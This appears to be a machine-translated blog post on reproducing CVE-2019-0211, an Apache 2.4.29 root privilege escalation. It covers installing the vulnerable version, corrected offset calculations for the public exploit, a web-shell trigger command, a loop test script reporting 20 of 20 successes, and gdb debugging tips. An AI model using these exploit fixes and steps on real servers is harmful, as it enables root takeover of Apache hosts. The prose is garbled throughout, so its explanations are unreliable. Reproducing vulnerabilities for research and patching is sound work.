This month, Apache was issued a mention the right vulnerability, and the day before yesterday on GitHub publication shows the use of script, these days I’m responsible for vulnerability emergency this vulnerability.
The present article is not called: the Apache mention the right vulnerability analysis is because I think CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation of this article analysis write good, so I didn’t need to be translated again and again, this article mainly described to reproduce the vulnerability in the process of stepping over the pit.
To reproduce the environment
I use the reproduction environment is:

System, with the system of the relationship is not great, the main problem is can not use package Manager to install the corresponding version of apache

$ lsb_release-a
Distributor ID: Ubuntu
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic

Apache version, reproduce the key in this version

$ apache2-v
Server version: Apache/2.4.29 (Ubuntu)
Server built: 2018-03-02T02:19:31

php version

$ php-v
PHP 7.2.15-0ubuntu0. 18. 04. 2 (cli) (built: Mar 22 2019 17:05:14) ( NTS )
Copyright © 1997-2018 The PHP Group
The Zend Engine v3. 2. 0, Copyright © 1998-2018 Zend Technologies
with Zend OPcache v7. 2. 15-0ubuntu0. 18. 04. 2, Copyright © 1999-2018, by Zend Technologies
apache using apt to install the version belonging to the already fixed version, so you need to specify what version: # apt install apache2=2.4.29-1ubuntu4 apache2-bin=2.4.29-1ubuntu4 apache2-utils=2.4.29-1ubuntu4 apache2-data=2.4.29-1ubuntu4
php directly with apt to install it.
exp address: https://github.com/cfreal/exploits/blob/master/CVE-2019-0211-apache/cfreal-carpediem.php
Need to turn on the ssl module: a2enmod ssl
About the need to start the ssl module description:
Even if it does not open ssl module, the vulnerability is also exist
If not turn on the ssl module, you modify the apache configuration, can open the other port, it is able to take advantage of
If the only open port 80, you’ll need to separately find a use chain, github announced exp in only open a port in the case is invalid
@cfreal the article already said, I’m here in say a sentence, the relevant code can look at 1 and 2 there is SAFE_ACCPET the macro definition:
/* On some architectures it’s safe to do unserialized accept()s in the single

• Listen case. But it’s never safe to do it in the case where there’s
• multiple Listen statements. Define SINGLE_LISTEN_UNSERIALIZED_ACCEPT
• when it’s safe in the single Listen case.
  */
  #ifdef SINGLE_LISTEN_UNSERIALIZED_ACCEPT
  #define SAFE_ACCEPT(stmt) (ap_listeners->next ? (stmt) : APR_SUCCESS)
  #else
  #define SAFE_ACCEPT(stmt) (stmt)
  #endif
  Simple to say, only on apache on multiple ports in the case, will generate a mutex mutex lock while in github published on the exp is through the apache mutex object to be used.

Run exp encountered in some pits
I’ve tried a lot of versions, not one version can directly use on Github exp, in the above surface releases, through commissioning research found two problems led to the use of failure:
$all_buckets = $i – 0x10 computing problems
$bucket_index = $bucket_index_middle – (int) ($total_nb_buckets / 2); Calculate the problem
The first calculation all_buckets address, and use gdb for debugging, you will find that this value did not count wrong, but in the implementation of the apache2ctl graceful command after all_buckets generate a new value, but only before the all_buckets address difference 0x38000, so this problem is very good solution:
$all_buckets = $i - 0x10 + 0x38000;
The second calculation is not necessary so complex, and in my test version, still the calculation of error address directly into the to:
$bucket_index = $bucket_index_middle;

ubuntu in a pit
My payload is: curl “http://localhost/cfreal-carpediem.php?cmd=id>/tmp/2323232”
On the surface of the watch is executed successfully, but did not in the/tmp directory found under the 2323232 file, after subsequent research found, systemd redirects apache’s tmp directory, perform the following:$find /tmp-name “2323232”you find the file, but only root user can access. If you don’t want systemd to redirect the tmp directory is also simple:
$ cat /lib/systemd/system/apache2. service
[Unit]
Description=The Apache HTTP Server
After=network. target remote-fs. target nss-lookup. target
[Service]
Type=forking
Environment=APACHE_STARTED_BY_SYSTEMD=true
ExecStart=/usr/sbin/apachectl start
ExecStop=/usr/sbin/apachectl stop
ExecReload=/usr/sbin/apachectl graceful
PrivateTmp=false
Restart=on-abort
[Install]
WantedBy=multi-user. target
This is false, PrivateTmp=false, and change after reboot, and then test it again in the tmp directory to write the file.

About the success rate of the argument
On the exp Note see that the use of not 100%success, the failure probability, so I wrote a script to test:
root@vultr:~# cat check
#!/ bin/bash
SUCC=0
COUNT=0
for i in $(seq 1 20)
do
let COUNT+=1
/etc/init. d/apache2 stop
sleep 1
/etc/init. d/apache2 start
if [ -f “/tmp/1982347” ];then
rm /tmp/1982347
fi
curl “http://localhost/cfreal-carpediem.php?cmd=id>/tmp/1982347”
apache2ctl graceful
sleep 1
if [ -f “/tmp/1982347” ];then
let SUCC+=1
fi
done
echo “COUNT: $COUNT”
echo “SUCCESS: $SUCC”
My tests ran 20 times results:

./ check

…
COUNT: 20
SUCCESS: 20
And did not encounter the case of failure

Summary
Other versions have not tested, but here to give some advice.
check all_buckets address this quite simple, after executing the exp later, with the output corresponding to the pid and all_buckets address, you can use gdb to attach up to check whether the address is correct: p all_bucketsPS: here to note that, the need to secure dbg package, only to have all_buckets symbols: apt install apache2-dbg=2.4.29-1ubuntu4 if there is a problem, you debug to check the exp in search all_buckets address of the process
If no problem, just use gdb to attach to the main process(the root permissions of that process), then the breakpoint in make_child, and then do apache2ctl graceful, the execution to finish and then in gdb, the process jumps to make_child function of time, and then output at once: p all_buckets, and exp to obtain the value of the comparison, if the same is no problem.
check my_bucket address in front of the process is the same as above, the focus of attention in make_child function of the my_bucket Assignment Code: 3 note here that, because of the above there is a fork, so in the gdb also want to add: set follow-fork-mode childmy_bucket the value is a pointer pointing to the heap spray address, if my_bucket value no problem, exp basic no problem, if not, just adjust the$bucket_index